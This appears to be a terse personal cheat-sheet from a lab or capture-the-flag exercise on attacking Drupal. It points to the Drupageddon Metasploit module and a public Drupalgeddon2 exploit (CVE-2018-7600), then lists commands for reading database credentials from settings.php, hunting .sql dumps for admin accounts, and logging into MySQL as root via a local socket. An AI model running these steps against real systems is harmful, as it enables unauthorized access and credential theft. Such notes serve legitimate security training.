‣

search exploit/multi/http/drupal_drupageddon (7.0 / 7.31)
<https://github.com/lorddemon/drupalgeddon2/blob/master/drupalgeddon2.py> (CVE-2018-7600)

cat /var/www/html/drupal/sites/default/settings.php (Database Credentials) ⇒ serch for username or password

find / -name '*.sql' 2>/dev/null

grep -iE "admin.*@.*" dump.sql

#search (error.log) for socket info
socket: '/run/mysqld/mysqld.sock' ⇒ mysql -u root -S /run/mysqld/mysqld.sock

# had this sqldb somewhere